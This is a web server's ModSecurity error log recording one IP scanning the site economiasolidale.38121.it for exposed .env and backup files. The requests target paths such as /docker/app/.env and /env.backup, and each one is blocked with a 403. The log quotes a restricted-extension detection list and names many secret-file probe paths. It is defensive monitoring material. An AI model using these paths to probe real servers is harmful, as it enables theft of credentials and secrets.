[Sun Dec 07 06:14:09.925194 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env"] [unique_id "aTUNIf-86ve6IRoVOdG0QQAAAAA"]
[Sun Dec 07 06:14:09.925424 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env"] [unique_id "aTUNIf-86ve6IRoVOdG0QQAAAAA"]
[Sun Dec 07 06:14:09.960957 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.local"] [unique_id "aTUNIf-86ve6IRoVOdG0QgAAAAA"]
[Sun Dec 07 06:14:09.961192 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.local"] [unique_id "aTUNIf-86ve6IRoVOdG0QgAAAAA"]
[Sun Dec 07 06:14:09.961421 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.local"] [unique_id "aTUNIf-86ve6IRoVOdG0QgAAAAA"]
[Sun Dec 07 06:14:10.045766 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.production"] [unique_id "aTUNIv-86ve6IRoVOdG0QwAAAAA"]
[Sun Dec 07 06:14:10.046014 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.production"] [unique_id "aTUNIv-86ve6IRoVOdG0QwAAAAA"]
[Sun Dec 07 06:14:10.046248 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.production"] [unique_id "aTUNIv-86ve6IRoVOdG0QwAAAAA"]
[Sun Dec 07 06:14:10.623104 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.staging"] [unique_id "aTUNIv-86ve6IRoVOdG0RAAAAAA"]
[Sun Dec 07 06:14:10.623343 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.staging"] [unique_id "aTUNIv-86ve6IRoVOdG0RAAAAAA"]
[Sun Dec 07 06:14:10.623560 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.staging"] [unique_id "aTUNIv-86ve6IRoVOdG0RAAAAAA"]
[Sun Dec 07 06:14:11.203041 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/awstats/.env"] [unique_id "aTUNI_-86ve6IRoVOdG0SwAAAAA"]
[Sun Dec 07 06:14:11.203274 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/awstats/.env"] [unique_id "aTUNI_-86ve6IRoVOdG0SwAAAAA"]
[Sun Dec 07 06:14:11.203488 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/awstats/.env"] [unique_id "aTUNI_-86ve6IRoVOdG0SwAAAAA"]
[Sun Dec 07 06:14:11.274943 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/conf/.env"] [unique_id "aTUNI_-86ve6IRoVOdG0TAAAAAA"]
[Sun Dec 07 06:14:11.275175 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/conf/.env"] [unique_id "aTUNI_-86ve6IRoVOdG0TAAAAAA"]
[Sun Dec 07 06:14:11.275381 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/conf/.env"] [unique_id "aTUNI_-86ve6IRoVOdG0TAAAAAA"]
[Sun Dec 07 06:14:11.322323 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aTUNI_-86ve6IRoVOdG0TQAAAAA"]
[Sun Dec 07 06:14:11.322688 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aTUNI_-86ve6IRoVOdG0TQAAAAA"]
[Sun Dec 07 06:14:11.322910 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aTUNI_-86ve6IRoVOdG0TQAAAAA"]
[Sun Dec 07 06:14:11.410692 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/www/.env"] [unique_id "aTUNI_-86ve6IRoVOdG0TgAAAAA"]
[Sun Dec 07 06:14:11.410920 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/www/.env"] [unique_id "aTUNI_-86ve6IRoVOdG0TgAAAAA"]
[Sun Dec 07 06:14:11.411129 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/www/.env"] [unique_id "aTUNI_-86ve6IRoVOdG0TgAAAAA"]
[Sun Dec 07 06:14:11.766426 2025] [:error] [pid 575112] [client 195.178.110.108:49510] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aTUNI1IBBWS88v5sLMHbRgAAAA4"]
[Sun Dec 07 06:14:11.766677 2025] [:error] [pid 575112] [client 195.178.110.108:49510] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aTUNI1IBBWS88v5sLMHbRgAAAA4"]
[Sun Dec 07 06:14:11.766844 2025] [:error] [pid 575112] [client 195.178.110.108:49510] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aTUNI1IBBWS88v5sLMHbRgAAAA4"]
[Sun Dec 07 06:14:11.871473 2025] [:error] [pid 575112] [client 195.178.110.108:49510] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/docker/app/.env"] [unique_id "aTUNI1IBBWS88v5sLMHbRwAAAA4"]
[Sun Dec 07 06:14:11.871722 2025] [:error] [pid 575112] [client 195.178.110.108:49510] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/docker/app/.env"] [unique_id "aTUNI1IBBWS88v5sLMHbRwAAAA4"]
[Sun Dec 07 06:14:11.871903 2025] [:error] [pid 575112] [client 195.178.110.108:49510] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/docker/app/.env"] [unique_id "aTUNI1IBBWS88v5sLMHbRwAAAA4"]
[Sun Dec 07 06:14:11.938974 2025] [:error] [pid 575112] [client 195.178.110.108:49510] [client 195.178.110.108] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/env.backup"] [unique_id "aTUNI1IBBWS88v5sLMHbSAAAAA4"]
[Sun Dec 07 06:14:11.939297 2025] [:error] [pid 575112] [client 195.178.110.108:49510] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/env.backup"] [unique_id "aTUNI1IBBWS88v5sLMHbSAAAAA4"]
[Sun Dec 07 06:14:11.939492 2025] [:error] [pid 575112] [client 195.178.110.108:49510] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/env.backup"] [unique_id "aTUNI1IBBWS88v5sLMHbSAAAAA4"]
[Sun Dec 07 06:14:21.003741 2025] [:error] [pid 573219] [client 195.178.110.108:36550] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.vscode/.env"] [unique_id "aTUNLTIIfFlI1ZI7Yt0ctwAAAAE"]
[Sun Dec 07 06:14:21.003998 2025] [:error] [pid 573219] [client 195.178.110.108:36550] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.vscode/.env"] [unique_id "aTUNLTIIfFlI1ZI7Yt0ctwAAAAE"]
[Sun Dec 07 06:14:21.004175 2025] [:error] [pid 573219] [client 195.178.110.108:36550] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.vscode/.env"] [unique_id "aTUNLTIIfFlI1ZI7Yt0ctwAAAAE"]
[Sun Dec 07 06:14:24.492850 2025] [:error] [pid 573222] [client 195.178.110.108:36558] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/js/.env"] [unique_id "aTUNMH-LlH4bdVGDXQ5iUAAAAAQ"]
[Sun Dec 07 06:14:24.493080 2025] [:error] [pid 573222] [client 195.178.110.108:36558] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/js/.env"] [unique_id "aTUNMH-LlH4bdVGDXQ5iUAAAAAQ"]
[Sun Dec 07 06:14:24.493261 2025] [:error] [pid 573222] [client 195.178.110.108:36558] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/js/.env"] [unique_id "aTUNMH-LlH4bdVGDXQ5iUAAAAAQ"]
[Sun Dec 07 06:14:30.742690 2025] [:error] [pid 573221] [client 195.178.110.108:47214] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/js/.env"] [unique_id "aTUNNlvgbiRUkefMDcyo7wAAAAM"]
[Sun Dec 07 06:14:30.742934 2025] [:error] [pid 573221] [client 195.178.110.108:47214] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/js/.env"] [unique_id "aTUNNlvgbiRUkefMDcyo7wAAAAM"]
